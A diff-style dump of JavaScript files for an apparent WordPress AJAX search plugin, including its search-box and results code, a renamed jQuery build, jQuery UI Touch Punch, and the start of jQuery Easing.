b=a.offsetTop,c=a.offsetLeft;f.support.doesNotIncludeMarginInBodyOffset&&(b+=parseFloat(f.css(a,"marginTop"))||0,c+=parseFloat(f.css(a,"marginLeft"))||0);return{top:b,left:c}},setOffset:function(a,b,c){var d=f.css(a,"position");d==="static"&&(a.style.position="relative");var e=f(a),g=e.offset(),h=f.css(a,"top"),i=f.css(a,"left"),j=(d==="absolute"||d==="fixed")&&f.inArray("auto",[h,i])>-1,k={},l={},m,n;j?(l=e.position(),m=l.top,n=l.left):(m=parseFloat(h)||0,n=parseFloat(i)||0),f.isFunction(b)&&(b=b.call(a,c,g)),b.top!=null&&(k.top=b.top-g.top+m),b.left!=null&&(k.left=b.left-g.left+n),"using"in b?b.using.call(a,k):e.css(k)}},f.fn.extend({position:function(){if(!this[0])return null;var a=this[0],b=this.offsetParent(),c=this.offset(),d=cx.test(b[0].nodeName)?{top:0,left:0}:b.offset();c.top-=parseFloat(f.css(a,"marginTop"))||0,c.left-=parseFloat(f.css(a,"marginLeft"))||0,d.top+=parseFloat(f.css(b[0],"borderTopWidth"))||0,d.left+=parseFloat(f.css(b[0],"borderLeftWidth"))||0;return{top:c.top-d.top,left:c.left-d.left}},offsetParent:function(){return this.map(function(){var a=this.offsetParent||c.body;while(a&&!cx.test(a.nodeName)&&f.css(a,"position")==="static")a=a.offsetParent;return a})}}),f.each({scrollLeft:"pageXOffset",scrollTop:"pageYOffset"},function(a,c){var d=/Y/.test(c);f.fn[a]=function(e){return f.access(this,function(a,e,g){var h=cy(a);if(g===b)return h?c in h?h[c]:f.support.boxModel&&h.document.documentElement[e]||h.document.body[e]:a[e];h?h.scrollTo(d?f(h).scrollLeft():g,d?g:f(h).scrollTop()):a[e]=g},a,e,arguments.length,null)}}),f.each({Height:"height",Width:"width"},function(a,c){var d="client"+a,e="scroll"+a,g="offset"+a;f.fn["inner"+a]=function(){var a=this[0];return a?a.style?parseFloat(f.css(a,c,"padding")):this[c]():null},f.fn["outer"+a]=function(a){var b=this[0];return b?b.style?parseFloat(f.css(b,c,a?"margin":"border")):this[c]():null},f.fn[c]=function(a){return f.access(this,function(a,c,h){var i,j,k,l;if(f.isWindow(a)){i=a.document,j=i.documentElement[d];return f.support.boxModel&&j||i.body&&i.body[d]||j}if(a.nodeType===9){i=a.documentElement;if(i[d]>=i[e])return i[d];return Math.max(a.body[e],i[e],a.body[g],i[g])}if(h===b){k=f.css(a,c),l=parseFloat(k);return f.isNumeric(l)?l:k}f(a).css(c,h)},c,a,arguments.length,null)}}),a.asljQuery=a.$=f,typeof define=="function"&&define.amd&&define.amd.jQuery&&define("asljQuery",[],function(){return f})})(window);
|
js/nomin/jquery.ajaxsearchpro.js
ADDED
@@ -0,0 +1,354 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
(function( $ ){
|
2 |
+
var methods = {
|
3 |
+
init : function( options ) {
|
4 |
+
var $this = $.extend({}, this, methods);
|
5 |
+
$this.searching = false;
|
6 |
+
$this.o = $.extend({}, options);
|
7 |
+
$this.n = new Object();
|
8 |
+
$this.n.container = $(this);
|
9 |
+
$this.n.probox = $('.probox', this);
|
10 |
+
$this.n.proinput = $('.proinput', this);
|
11 |
+
$this.n.text = $('.proinput input', this);
|
12 |
+
$this.n.loading = $('.proinput .loading', this);
|
13 |
+
$this.n.proloading = $('.proloading', this);
|
14 |
+
$this.n.promagnifier = $('.promagnifier', this);
|
15 |
+
$this.n.prosettings = $('.prosettings', this);
|
16 |
+
$this.n.searchsettings = $('.searchsettings', this);
|
17 |
+
$this.n.resultsDiv = $(this).next();
|
18 |
+
$this.n.items = $('.item', $this.n.resultsDiv);
|
19 |
+
$this.n.results = $('.results', $this.n.resultsDiv);
|
20 |
+
$this.n.resdrg = $('.resdrg', $this.n.resultsDiv);
|
21 |
+
$this.n.drag = $('.resdrg', $this.n.resultsDiv);
|
22 |
+
$this.n.scrollbar = $(".scrollbar", $this.n.resultsDiv);
|
23 |
+
|
24 |
+
//$this.cleanUp();
|
25 |
+
|
26 |
+
$this.n.resultsDiv.appendTo("body");
|
27 |
+
$this.n.searchsettings.appendTo("body");
|
28 |
+
|
29 |
+
if ( $.browser.msie && $.browser.version<9 ) {
|
30 |
+
$this.n.searchsettings.addClass("ie78");
|
31 |
+
}
|
32 |
+
|
33 |
+
$this.n.resultsDiv.css({
|
34 |
+
opacity: 0
|
35 |
+
});
|
36 |
+
$(document).bind("click", function(){
|
37 |
+
$this.hideResults();
|
38 |
+
$this.hideSettings();
|
39 |
+
});
|
40 |
+
$(this).bind("click", function(e){
|
41 |
+
e.stopImmediatePropagation();
|
42 |
+
});
|
43 |
+
$this.n.resultsDiv.bind("click", function(e){
|
44 |
+
e.stopImmediatePropagation();
|
45 |
+
});
|
46 |
+
$this.n.searchsettings.bind("click", function(e){
|
47 |
+
e.stopImmediatePropagation();
|
48 |
+
});
|
49 |
+
/*$this.scroll = $this.n.results.mCustomScrollbar({
|
50 |
+
scrollButtons:{
|
51 |
+
enable:true,
|
52 |
+
scrollType:"pixels",
|
53 |
+
scrollSpeed:parseInt($this.o.resultitemheight),
|
54 |
+
scrollAmount:parseInt($this.o.resultitemheight)
|
55 |
+
},
|
56 |
+
callbacks:{
|
57 |
+
onScroll:function(){
|
58 |
+
if (is_touch_device()) return;
|
59 |
+
var top = parseInt($('.mCSB_container', $this.n.results).position().top);
|
60 |
+
scr = ((((top%($this.o.resultitemheight+3))-top)==0 && (Math.abs(top)%($this.o.resultitemheight+3))<($this.o.resultitemheight/2+3))?'first':(-(Math.abs(top)%($this.o.resultitemheight+3))-top ));
|
61 |
+
if ((Math.abs(top)%($this.o.resultitemheight+3))>($this.o.resultitemheight/2)) {
|
62 |
+
if (scr!='first') scr+=($this.o.resultitemheight+3);
|
63 |
+
$(".mCSB_container", $this.n.resultsDiv).animate({
|
64 |
+
top: -scr
|
65 |
+
});
|
66 |
+
} else {
|
67 |
+
$(".mCSB_container", $this.n.resultsDiv).animate({
|
68 |
+
top: -scr
|
69 |
+
});
|
70 |
+
}
|
71 |
+
}
|
72 |
+
}
|
73 |
+
}); */
|
74 |
+
|
75 |
+
$this.n.prosettings.click(function(){
|
76 |
+
if ($this.n.prosettings.attr('opened')==0) {
|
77 |
+
$this.showSettings();
|
78 |
+
} else {
|
79 |
+
$this.hideSettings();
|
80 |
+
}
|
81 |
+
});
|
82 |
+
|
83 |
+
var t;
|
84 |
+
$(window).bind("resize", function(){
|
85 |
+
$this.resize();
|
86 |
+
});
|
87 |
+
$(window).bind("scroll", function() {
|
88 |
+
$this.scrolling(false);
|
89 |
+
});
|
90 |
+
$(window).trigger('resize');
|
91 |
+
$(window).trigger('scroll');
|
92 |
+
$this.n.promagnifier.click(function(){
|
93 |
+
clearTimeout(t);
|
94 |
+
t = setTimeout (function() {
|
95 |
+
$this.search();
|
96 |
+
t = null;
|
97 |
+
}, 700);
|
98 |
+
});
|
99 |
+
$this.n.text.keyup(function(){
|
100 |
+
$this.n.promagnifier.trigger('click');
|
101 |
+
});
|
102 |
+
|
103 |
+
return $this;
|
104 |
+
},
|
105 |
+
destroy : function( ) {
|
106 |
+
return this.each(function(){
|
107 |
+
var $this = $.extend({}, this, methods);
|
108 |
+
$(window).unbind($this);
|
109 |
+
})
|
110 |
+
},
|
111 |
+
searchfor: function(phrase) {
|
112 |
+
$(".proinput input",this).val(phrase).trigger("keyup");
|
113 |
+
},
|
114 |
+
search : function() {
|
115 |
+
var $this = $.extend({}, this, methods);
|
116 |
+
if ($this.searching && 0) return;
|
117 |
+
if ($this.n.text.val().length<$this.o.charcount) return;
|
118 |
+
$this.searching = true;
|
119 |
+
$this.n.proloading.css({
|
120 |
+
visibility: "visible"
|
121 |
+
});
|
122 |
+
$this.hideSettings();
|
123 |
+
$this.hideResults();
|
124 |
+
var data = {
|
125 |
+
action: 'ajaxsearchlite_search',
|
126 |
+
s: $this.n.text.val(),
|
127 |
+
options: $('form' ,$this.n.searchsettings).serialize()
|
128 |
+
};
|
129 |
+
jQuery.post(ajaxsearchpro.ajaxurl, data, function(response) {
|
130 |
+
$this.n.resdrg.html("");
|
131 |
+
if (response.nores!=null && response.keywords!=null) {
|
132 |
+
var str = $this.o.noresultstext+" "+$this.o.didyoumeantext+"<br>";
|
133 |
+
for(var i=0;i<response.keywords.length;i++) {
|
134 |
+
str = str + "<span class='keyword'>"+response.keywords[i]+"</span>";
|
135 |
+
}
|
136 |
+
$this.n.resdrg.append("<div class='nores'>"+str+"</div>");
|
137 |
+
$(".keyword", $this.n.resdrg).bind('click', function(){
|
138 |
+
$this.n.text.val($(this).html());
|
139 |
+
$this.n.promagnifier.trigger('click');
|
140 |
+
});
|
141 |
+
} else if (response.length>0) {
|
142 |
+
for(var i=0;i<response.length;i++) {
|
143 |
+
var imageDiv = "";
|
144 |
+
var desc = "";
|
145 |
+
var authorSpan = "";
|
146 |
+
var dateSpan = "";
|
147 |
+
if (response[i].image!=null && response[i].image!="") {
|
148 |
+
imageDiv = "\
|
149 |
+
<div class='image' style='width:"+$this.o.imagewidth+"px;height:"+$this.o.imageheight+"px;'>\
|
150 |
+
<img src='"+response[i].image+"'> \
|
151 |
+
</div>";
|
152 |
+
}
|
153 |
+
if ($this.o.showauthor==1) {
|
154 |
+
authorSpan = "<span class='author'>"+response[i].author+"</span>";
|
155 |
+
}
|
156 |
+
if ($this.o.showdate==1) {
|
157 |
+
dateSpan = "<span class='date'>"+response[i].date+"</span>";
|
158 |
+
}
|
159 |
+
if ($this.o.showdescription==1) {
|
160 |
+
desc = response[i].content;
|
161 |
+
}
|
162 |
+
var id = 'item_'+i;
|
163 |
+
var clickable = ""
|
164 |
+
if ($this.o.resultareaclickable==1) {
|
165 |
+
clickable = "<span class='overlap'></span>";
|
166 |
+
}
|
167 |
+
var result = "\
|
168 |
+
<div class='item' id='"+id+"' style='height:"+$this.o.resultitemheight+"px;'> \
|
169 |
+
"+imageDiv+" \
|
170 |
+
<div class='content' style='height:"+$this.o.resultitemheight+"px;'> \
|
171 |
+
<h3><a href='"+response[i].link+"'>"+response[i].title+clickable+"</a></h3> \
|
172 |
+
<div class='etc'>"+authorSpan+" \
|
173 |
+
"+dateSpan+"</div> \
|
174 |
+
<p class='desc'>"+desc+"</p> \
|
175 |
+
</div> \
|
176 |
+
<div class='clear'></div> \
|
177 |
+
</div>";
|
178 |
+
result = $(result);
|
179 |
+
$this.n.resdrg.append(result);
|
180 |
+
|
181 |
+
}
|
182 |
+
} else {
|
183 |
+
$this.n.resdrg.append("<div class='nores'>"+$this.o.noresultstext+"</div>");
|
184 |
+
}
|
185 |
+
$this.n.items = $('.item', $this.n.resultsDiv);
|
186 |
+
$this.showResults();
|
187 |
+
$this.n.proloading.css({
|
188 |
+
visibility: "hidden"
|
189 |
+
});
|
190 |
+
}, "json");
|
191 |
+
},
|
192 |
+
showResults : function( ) {
|
193 |
+
var $this = $.extend({}, this, methods);
|
194 |
+
$this.scrolling(true);
|
195 |
+
$this.n.resdrg.css({
|
196 |
+
"position":"relative"
|
197 |
+
});
|
198 |
+
if ($this.n.items.length<=$this.o.itemscount) {
|
199 |
+
$this.n.scrollbar.css({
|
200 |
+
"display":"none"
|
201 |
+
});
|
202 |
+
} else {
|
203 |
+
$this.n.scrollbar.css({
|
204 |
+
"display":"inline"
|
205 |
+
});
|
206 |
+
}
|
207 |
+
var top = $this.n.resultsDiv.position().top;
|
208 |
+
$this.n.resultsDiv.css({
|
209 |
+
"top": top-100,
|
210 |
+
opacity: 0,
|
211 |
+
visibility: "visible"
|
212 |
+
}).animate({
|
213 |
+
"top": top,
|
214 |
+
opacity: 1
|
215 |
+
});
|
216 |
+
if ($this.n.items.length>0) {
|
217 |
+
var count = (($this.n.items.length<$this.o.itemscount)?$this.n.items.length:$this.o.itemscount);
|
218 |
+
$this.n.results.css({
|
219 |
+
height: (count * $this.n.items.outerHeight(true)+3)
|
220 |
+
});
|
221 |
+
if ($this.o.highlight==1) {
|
222 |
+
var wholew = (($this.o.highlightwholewords==1)?true:false);
|
223 |
+
$this.n.resultsDiv.highlight($this.n.text.val().split(" "), { element: 'span', className: 'highlighted', wordsOnly: wholew });
|
224 |
+
}
|
225 |
+
|
226 |
+
}
|
227 |
+
$this.resize();
|
228 |
+
if ($this.n.items.length==0) {
|
229 |
+
var h = ($('.nores', $this.n.results).outerHeight(true)>($this.o.resultitemheight)?($this.o.resultitemheight):$('.nores', $this.n.results).outerHeight(true));
|
230 |
+
$this.n.results.css({
|
231 |
+
height: 11110
|
232 |
+
});
|
233 |
+
$this.n.results.css({
|
234 |
+
height: $('.nores', $this.n.results).outerHeight(true)
|
235 |
+
});
|
236 |
+
}
|
237 |
+
$this.scrolling(true);
|
238 |
+
$this.searching = false;
|
239 |
+
$this.n.resdrg.css({
|
240 |
+
"position":"absolute"
|
241 |
+
});
|
242 |
+
$this.scroll = $this.n.resultsDiv.tinyscrollbar({ axis: 'y'});
|
243 |
+
},
|
244 |
+
hideResults : function( ) {
|
245 |
+
var $this = $.extend({}, this, methods);
|
246 |
+
$this.n.resultsDiv
|
247 |
+
.animate({
|
248 |
+
opacity: 0
|
249 |
+
},{
|
250 |
+
complete: function() {
|
251 |
+
$(this).css({
|
252 |
+
visibility: "hidden"
|
253 |
+
});
|
254 |
+
}
|
255 |
+
});
|
256 |
+
},
|
257 |
+
showSettings : function( ) {
|
258 |
+
var $this = $.extend({}, this, methods);
|
259 |
+
$this.scrolling(true);
|
260 |
+
$this.n.searchsettings.css({
|
261 |
+
opacity: 0,
|
262 |
+
visibility: "visible",
|
263 |
+
top: "-=50px"
|
264 |
+
});
|
265 |
+
$this.n.searchsettings.animate({
|
266 |
+
opacity: 1,
|
267 |
+
top: "+=50px"
|
268 |
+
});
|
269 |
+
$this.n.prosettings.attr('opened', 1);
|
270 |
+
},
|
271 |
+
hideSettings : function( ) {
|
272 |
+
var $this = $.extend({}, this, methods);
|
273 |
+
$this.n.searchsettings.animate({
|
274 |
+
opacity: 0
|
275 |
+
}, {
|
276 |
+
complete: function() {
|
277 |
+
$(this).css({
|
278 |
+
visibility: "hidden"
|
279 |
+
});
|
280 |
+
}
|
281 |
+
});
|
282 |
+
$this.n.prosettings.attr('opened', 0);
|
283 |
+
},
|
284 |
+
cleanUp: function( ) {
|
285 |
+
var $this = $.extend({}, this, methods);
|
286 |
+
$('body>#ajaxsearchlitesettings').remove();
|
287 |
+
$('body>#ajaxsearchliteres').remove();
|
288 |
+
},
|
289 |
+
resize : function( ) {
|
290 |
+
var $this = $.extend({}, this, methods);
|
291 |
+
$this.n.proinput.css({
|
292 |
+
width: ($this.n.probox.width()-8-($this.n.proinput.outerWidth()-$this.n.proinput.width())-$this.n.proloading.outerWidth(true)-$this.n.prosettings.outerWidth(true)-$this.n.promagnifier.outerWidth(true)-10)
|
293 |
+
});
|
294 |
+
if ($this.n.prosettings.attr('opened')!=0) {
|
295 |
+
$this.n.searchsettings.css({
|
296 |
+
display: "block",
|
297 |
+
top: $this.n.prosettings.offset().top+$this.n.prosettings.height()-2,
|
298 |
+
left: $this.n.prosettings.offset().left+$this.n.prosettings.width()-$this.n.searchsettings.width()
|
299 |
+
});
|
300 |
+
}
|
301 |
+
if ($this.n.resultsDiv.css('visibility')!='hidden') {
|
302 |
+
$this.n.resultsDiv.css({
|
303 |
+
width: $this.n.container.width()-($this.n.resultsDiv.outerWidth(true)-$this.n.resultsDiv.width()),
|
304 |
+
top: $this.n.container.offset().top+$this.n.container.outerHeight(true)+10,
|
305 |
+
left: $this.n.container.offset().left
|
306 |
+
});
|
307 |
+
|
308 |
+
$('.content', $this.n.items).each(function(){
|
309 |
+
var imageWidth = (($(this).prev().css('display')=="none")?0:$(this).prev().outerWidth(true));
|
310 |
+
$(this).css({
|
311 |
+
width: ($(this.parentNode).width()-$(this).prev().outerWidth(true)-$(this).outerWidth() + $(this).width())
|
312 |
+
});
|
313 |
+
});
|
314 |
+
}
|
315 |
+
},
|
316 |
+
scrolling: function(ignoreVisibility) {
|
317 |
+
var $this = $.extend({}, this, methods);
|
318 |
+
if (ignoreVisibility==true || $this.n.searchsettings.css('visibility')=='visible') {
|
319 |
+
$this.n.searchsettings.css({
|
320 |
+
display: "block",
|
321 |
+
top: $this.n.prosettings.offset().top+$this.n.prosettings.height()-2,
|
322 |
+
left: $this.n.prosettings.offset().left+$this.n.prosettings.width()-$this.n.searchsettings.width()
|
323 |
+
});
|
324 |
+
}
|
325 |
+
if (ignoreVisibility==true || $this.n.resultsDiv.css('visibility')=='visible') {
|
326 |
+
$this.n.resultsDiv.css({
|
327 |
+
width: $this.n.container.width()-($this.n.resultsDiv.outerWidth(true)-$this.n.resultsDiv.width()),
|
328 |
+
top: $this.n.container.offset().top+$this.n.container.outerHeight(true)+10,
|
329 |
+
left: $this.n.container.offset().left
|
330 |
+
});
|
331 |
+
$('.content', $this.n.items).each(function(){
|
332 |
+
var imageWidth = (($(this).prev().css('display')=="none")?0:$(this).prev().outerWidth(true));
|
333 |
+
$(this).css({
|
334 |
+
width: ($(this.parentNode).width()-$(this).prev().outerWidth(true)-$(this).outerWidth() + $(this).width())
|
335 |
+
});
|
336 |
+
});
|
337 |
+
}
|
338 |
+
}
|
339 |
+
};
|
340 |
+
|
341 |
+
$.fn.ajaxsearchpro = function( method ) {
|
342 |
+
if ( methods[method] ) {
|
343 |
+
return methods[method].apply( this, Array.prototype.slice.call( arguments, 1 ));
|
344 |
+
} else if ( typeof method === 'object' || ! method ) {
|
345 |
+
return methods.init.apply( this, arguments );
|
346 |
+
} else {
|
347 |
+
$.error( 'Method ' + method + ' does not exist on jQuery.ajaxsearchpro' );
|
348 |
+
}
|
349 |
+
|
350 |
+
};
|
351 |
+
function is_touch_device(){
|
352 |
+
return !!("ontouchstart" in window) ? 1 : 0;
|
353 |
+
}
|
354 |
+
})( asljQuery );
|
js/nomin/jquery.drag.fix.js
ADDED
@@ -0,0 +1,11 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/*
|
2 |
+
* jQuery UI Touch Punch 0.2.2
|
3 |
+
*
|
4 |
+
* Copyright 2011, Dave Furfero
|
5 |
+
* Dual licensed under the MIT or GPL Version 2 licenses.
|
6 |
+
*
|
7 |
+
* Depends:
|
8 |
+
* jquery.ui.widget.js
|
9 |
+
* jquery.ui.mouse.js
|
10 |
+
*/
|
11 |
+
(function(b){b.support.touch="ontouchend" in document;if(!b.support.touch){return;}var c=b.ui.mouse.prototype,e=c._mouseInit,a;function d(g,h){if(g.originalEvent.touches.length>1){return;}g.preventDefault();var i=g.originalEvent.changedTouches[0],f=document.createEvent("MouseEvents");f.initMouseEvent(h,true,true,window,1,i.screenX,i.screenY,i.clientX,i.clientY,false,false,false,false,0,null);g.target.dispatchEvent(f);}c._touchStart=function(g){var f=this;if(a||!f._mouseCapture(g.originalEvent.changedTouches[0])){return;}a=true;f._touchMoved=false;d(g,"mouseover");d(g,"mousemove");d(g,"mousedown");};c._touchMove=function(f){if(!a){return;}this._touchMoved=true;d(f,"mousemove");};c._touchEnd=function(f){if(!a){return;}d(f,"mouseup");d(f,"mouseout");if(!this._touchMoved){d(f,"click");}a=false;};c._mouseInit=function(){var f=this;f.element.bind("touchstart",b.proxy(f,"_touchStart")).bind("touchmove",b.proxy(f,"_touchMove")).bind("touchend",b.proxy(f,"_touchEnd"));e.call(f);};})(asljQuery);
|
js/nomin/jquery.easing.compatibility.js
ADDED
@@ -0,0 +1,59 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/*!
|
2 |
+
* jQuery Easing Compatibility v1 - http://gsgd.co.uk/sandbox/jquery.easing.php
|
3 |
+
*
|
4 |
+
* Adds compatibility for applications that use the pre 1.2 easing names
|
5 |
+
*
|
6 |
+
* Copyright (c) 2007 George Smith
|
7 |
+
* Licensed under the MIT License:
|
8 |
+
* http://www.opensource.org/licenses/mit-license.php
|
9 |
+
*/
|
10 |
+
(function(jQuery){
|
11 |
+
jQuery.extend( jQuery.easing,
|
12 |
+
{
|
13 |
+
easeIn: function (x, t, b, c, d) {
|
14 |
+
return jQuery.easing.easeInQuad(x, t, b, c, d);
|
15 |
+
},
|
16 |
+
easeOut: function (x, t, b, c, d) {
|
17 |
+
return jQuery.easing.easeOutQuad(x, t, b, c, d);
|
18 |
+
},
|
19 |
+
easeInOut: function (x, t, b, c, d) {
|
20 |
+
return jQuery.easing.easeInOutQuad(x, t, b, c, d);
|
21 |
+
},
|
22 |
+
expoin: function(x, t, b, c, d) {
|
23 |
+
return jQuery.easing.easeInExpo(x, t, b, c, d);
|
24 |
+
},
|
25 |
+
expoout: function(x, t, b, c, d) {
|
26 |
+
return jQuery.easing.easeOutExpo(x, t, b, c, d);
|
27 |
+
},
|
28 |
+
expoinout: function(x, t, b, c, d) {
|
29 |
+
return jQuery.easing.easeInOutExpo(x, t, b, c, d);
|
30 |
+
},
|
31 |
+
bouncein: function(x, t, b, c, d) {
|
32 |
+
return jQuery.easing.easeInBounce(x, t, b, c, d);
|
33 |
+
},
|
34 |
+
bounceout: function(x, t, b, c, d) {
|
35 |
+
return jQuery.easing.easeOutBounce(x, t, b, c, d);
|
36 |
+
},
|
37 |
+
bounceinout: function(x, t, b, c, d) {
|
38 |
+
return jQuery.easing.easeInOutBounce(x, t, b, c, d);
|
39 |
+
},
|
40 |
+
elasin: function(x, t, b, c, d) {
|
41 |
+
return jQuery.easing.easeInElastic(x, t, b, c, d);
|
42 |
+
},
|
43 |
+
elasout: function(x, t, b, c, d) {
|
44 |
+
return jQuery.easing.easeOutElastic(x, t, b, c, d);
|
45 |
+
},
|
46 |
+
elasinout: function(x, t, b, c, d) {
|
47 |
+
return jQuery.easing.easeInOutElastic(x, t, b, c, d);
|
48 |
+
},
|
49 |
+
backin: function(x, t, b, c, d) {
|
50 |
+
return jQuery.easing.easeInBack(x, t, b, c, d);
|
51 |
+
},
|
52 |
+
backout: function(x, t, b, c, d) {
|
53 |
+
return jQuery.easing.easeOutBack(x, t, b, c, d);
|
54 |
+
},
|
55 |
+
backinout: function(x, t, b, c, d) {
|
56 |
+
return jQuery.easing.easeInOutBack(x, t, b, c, d);
|
57 |
+
}
|
58 |
+
});
|
59 |
+
})(asljQuery);
|
js/nomin/jquery.easing.js
ADDED
@@ -0,0 +1,206 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/*
|
2 |
+
* jQuery Easing v1.3 - http://gsgd.co.uk/sandbox/jquery/easing/
|
3 |
+
*
|
4 |
+
* Uses the built in easing capabilities added In jQuery 1.1
|
5 |
+
* to offer multiple easing options
|
6 |
+
*
|
7 |
+
* TERMS OF USE - jQuery Easing
|
8 |
+
*
|
9 |
+
* Open source under the BSD License.
|
10 |
+
*
|
11 |
+
* Copyright © 2008 George McGinley Smith
|
12 |
+
* All rights reserved.
|
13 |
+
*
|
14 |
+
* Redistribution and use in source and binary forms, with or without modification,
|
15 |
+
* are permitted provided that the following conditions are met:
|
16 |
+
*
|
17 |
+
* Redistributions of source code must retain the above copyright notice, this list of
|
18 |
+
* conditions and the following disclaimer.
|
19 |
+
* Redistributions in binary form must reproduce the above copyright notice, this list
|
20 |
+
* of conditions and the following disclaimer in the documentation and/or other materials
|
21 |
+
* provided with the distribution.
|
22 |
+
*
|
23 |
+
* Neither the name of the author nor the names of contributors may be used to endorse
|
24 |
+
* or promote products derived from this software without specific prior written permission.
|
25 |
+
*
|
26 |
+
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY
|
27 |
+
* EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
|
28 |
+
* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
|
29 |
+
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
|
30 |
+
* EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
|
31 |
+
* GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
|
32 |
+
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
|
33 |
+
* NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
|
34 |
+
* OF THE POSSIBILITY OF SUCH DAMAGE.
|
35 |
+
*
|
36 |
+
*/
|
37 |
+
|
38 |
+
// t: current time, b: begInnIng value, c: change In value, d: duration
|
39 |
+
(function(jQuery){
|
40 |
+
jQuery.easing['jswing'] = jQuery.easing['swing'];
|
41 |
+
|
42 |
+
jQuery.extend( jQuery.easing,
|
43 |
+
{
|
